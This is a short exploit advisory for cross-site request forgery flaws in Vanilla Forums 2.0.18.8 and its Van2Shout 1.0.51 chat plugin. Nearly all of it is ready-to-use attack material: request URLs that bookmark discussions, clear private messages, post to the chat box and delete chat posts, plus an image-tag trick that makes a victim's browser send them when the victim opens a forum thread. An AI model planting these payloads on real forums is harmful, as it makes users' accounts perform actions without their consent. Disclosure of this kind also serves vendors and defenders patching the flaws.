# Exploit Title: Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF # Google Dork: n/a # Date: 13/4/13 # Exploit Author: Henry Hoggard # Vendor Homepage: [http://vanillaforums.org/ , http://vanillaforums.org/addon/van2shout-plugin] # Software Link: [http://vanillaforums.org/download, http://vanillaforums.org/get/van2shout-plugin-1.051] # Version: [2.0.18.8 , 1.0.51] # Tested on: [Debian] # CVE : ======================= You can exploit these by having the user visit a thread with the img src of the below urls. eg <img src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where 1337 is the id. Bookmark CSRF: http://site.org/index.php=/vanilla/discussion/bookmark/1337 UnBookmark CSRF http://site.org/index.php=/vanilla/discussion/bookmark/1337? Delete Message CSRF http://site.org/index.php=/messages/clear/1337 Post to Van2Shout Chat Box CSRF http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage Delete Message from Van2Shout Chatbox CSRF http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337Брой прочитания на тази страница: 845
Vanilla Forums Van2Shout Plugin 1.0.51 – Multiple CSRF Vulnerabilities